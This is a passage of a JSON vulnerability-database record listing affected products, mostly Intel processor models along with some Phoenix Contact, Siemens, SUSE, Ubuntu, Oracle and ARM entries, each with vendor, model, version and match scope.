        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2820"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4020y"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5005u"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5649"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607"
      },
      {
        "_id": null,
        "model": "vl2 ppc 9000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5557u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400t"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3825"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2340ue"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2538"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "930"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430um"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100h"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2830"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2430m"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2930"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2803"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440hq"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775d"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3580"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600t"
      },
      {
        "_id": null,
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.2"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2810"
      },
      {
        "_id": null,
        "model": "xeon e5 2623 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5020u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210y"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3950"
      },
      {
        "_id": null,
        "model": "vl2 bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4102e"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3508"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3230m"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3815"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5606"
      },
      {
        "_id": null,
        "model": "xeon e3 1501l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2350m"
      },
      {
        "_id": null,
        "model": "vl2 ppc9 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712mq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v4"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6360u"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735d"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2312m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7530"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5506"
      },
      {
        "_id": null,
        "model": "xeon e5 2440 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1900"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2640m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112e"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330m"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330t"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2430l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v4"
      },
      {
        "_id": null,
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4628l_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3337u"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v6"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2805"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2718"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3708"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402ec"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870hq"
      },
      {
        "_id": null,
        "model": "xeon e5 2630",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2580"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v4"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1505m_v6"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4260u"
      },
      {
        "_id": null,
        "model": "xeon e5 2650l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600k"
      },
      {
        "_id": null,
        "model": "xeon e5 2438l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540um"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2730"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2760qm"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7600u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v2"
      },
      {
        "_id": null,
        "model": "bl bpc 2001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "740qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4910mq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2467m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3360m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "460m"
      },
      {
        "_id": null,
        "model": "xeon e3 1501m v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6585r"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2470 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2608l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4578u"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y30"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3635qm"
      },
      {
        "_id": null,
        "model": "xeon e3 1220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "_id": null,
        "model": "xeon e3 12201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5675"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2130"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8550u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5560"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870_v2"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3795"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860hq"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735g"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v2"
      },
      {
        "_id": null,
        "model": "bl2 bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "vl2 bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6152"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7560u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4288u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699r_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "bl ppc17 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.10"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570s"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x6550"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3470"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5530"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134m"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3235rk"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3475s"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1750"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3230rk"
      },
      {
        "_id": null,
        "model": "xeon e3 1505m v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6287u"
      },
      {
        "_id": null,
        "model": "xeon e5 1428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330te"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210h"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8830"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2550"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300y"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v2"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300u"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3758"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v2"
      },
      {
        "_id": null,
        "model": "cortex-a15",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3440"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v3"
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6132"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8156"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qm"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2375m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hk"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v2"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5638"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "970"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3858"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340te"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5518"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6154"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210f"
      },
      {
        "_id": null,
        "model": "vl2 ppc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v3"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y71"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5570"
      },
      {
        "_id": null,
        "model": "xeon e5 2408l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1278l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5580"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10a"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142f"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7567u"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6098p"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2617m"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2910"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3000"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670r"
      },
      {
        "_id": null,
        "model": "simatic itc1500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4025u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470s"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126f"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2418l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
